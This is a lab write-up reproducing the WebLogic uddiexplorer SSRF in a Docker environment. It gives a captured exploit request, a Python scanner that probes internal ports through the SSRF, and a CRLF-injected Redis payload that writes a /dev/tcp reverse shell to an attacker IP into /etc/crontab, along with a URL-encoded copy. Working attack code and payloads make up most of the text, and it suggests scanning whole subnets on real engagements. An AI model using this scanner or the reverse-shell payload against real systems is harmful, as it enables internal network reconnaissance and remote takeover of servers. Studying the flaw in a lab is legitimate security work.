WebLogic SSRF vulnerability
Reproduction environment
Reproduction steps
Run docker-compose up -d to build the environment.
Visit http://192.168.61.143:7001/uddiexplorer
The SSRF vulnerability lives in http://192.168.61.143:7001/uddiexplorer/SearchPublicRegistries.jsp: the operator parameter is a URL that the server fetches itself.
If the target port is not open, the response contains a "not connect over" message (the connection attempt failed).
Besides POST, the request can also be sent as a GET:
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
Host: 192.168.61.143:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=zFmmdFQbM54b4l88TpJhP2vP3QztD1XWh58xpL9X2QssM5vr3pGv!-1728212900
Upgrade-Insecure-Requests: 1
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://172.18.0.2:6379 which did not have a valid SOAP content-type: null.
(A response containing "Received a response" likewise shows that the target IP exists and the port is open; the server reached it but got something other than SOAP back.)
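A small probe helper for the step above, written for this page as an added example rather than taken from the original write-up: it builds the same GET request with an attacker-chosen operator value and classifies each response by the two markers quoted above ("Received a response" for an open port, "not connect over" for a closed one). The base URL and the host:port list are the lab values assumed here; the fetch callable is injectable so the classification can be exercised offline on constructed responses.

```python
"""Probe internal hosts/ports through the uddiexplorer SSRF.

Added example, not from the original write-up. Assumes the vulhub target
192.168.61.143:7001 and the two response markers quoted in the text.
"""
from urllib.parse import urlencode
from urllib.request import urlopen

# Assumed lab target (from the write-up's own environment).
BASE = "http://192.168.61.143:7001/uddiexplorer/SearchPublicRegistries.jsp"


def build_probe_url(target: str, base: str = BASE) -> str:
    """Return the GET URL that makes WebLogic connect to `target` (host:port).

    The parameters mirror the captured request; only `operator` is attacker-chosen.
    """
    params = {
        "rdoSearch": "name",
        "txtSearchname": "sdf",
        "txtSearchkey": "",
        "txtSearchfor": "",
        "selfor": "Business location",
        "btnSubmit": "Search",
        "operator": f"http://{target}",
    }
    return f"{base}?{urlencode(params)}"


def classify_response(body: str) -> str:
    """Map the server's error text to a port state using the markers seen on the page."""
    if "Received a response" in body:
        return "open"      # server connected and got a non-SOAP reply
    if "not connect over" in body:
        return "closed"    # server could not complete the connection
    return "unknown"       # anything else (timeout page, different error, ...)


def scan(targets, fetch=None) -> dict:
    """Probe each host:port and return {target: state}.

    `fetch(url) -> str` is injectable so the scan can be tested offline
    against constructed response bodies instead of a live WebLogic.
    """
    if fetch is None:
        def fetch(url):
            with urlopen(url, timeout=10) as resp:
                return resp.read().decode("utf-8", "replace")
    return {t: classify_response(fetch(build_probe_url(t))) for t in targets}


if __name__ == "__main__":
    # Assumed internal Redis host from the write-up, plus one closed port for contrast.
    for host_port, state in scan(["172.18.0.2:6379", "172.18.0.2:6380"]).items():
        print(host_port, state)
```

The probe only needs one request per host:port, so looping it over a /24 and a short port list is enough to map the Docker network the write-up lands in; throttle it on a real engagement, since every probe is a connection made by the WebLogic host itself.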
Injecting HTTP headers: a reverse shell through Redis
The probing above found a Redis server on the internal network. Since Redis accepts newline-separated plain-text commands, we inject CRLFs into the HTTP request WebLogic sends to it and use Redis to spawn a reverse shell.
Send three Redis commands (padded with junk lines before and after) that write a reverse-shell entry into /etc/crontab:
test

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.61.130/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

aaa
Since I am using a GET request, the payload also has to be URL-encoded:
%74%65%73%74%0d%0a%0d%0a%73%65%74%20%31%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%72%6f%6f%74%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%36%31%2e%31%33%30%2f%34%34%34%34%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%0d%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%65%74%63%2f%0d%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%63%72%6f%6e%74%61%62%0d%0a%73%61%76%65%0d%0a%0d%0a%61%61%61
Looking at /etc/crontab inside the redis container confirms that our command was written into crontab successfully.
Postscript
2. At first I misread the address and submitted the crontab write to 172.18.0.3:6379, and strangely it still gave me a reverse shell. Unfortunately the screenshot from that reproduction got lost when I re-edited the post.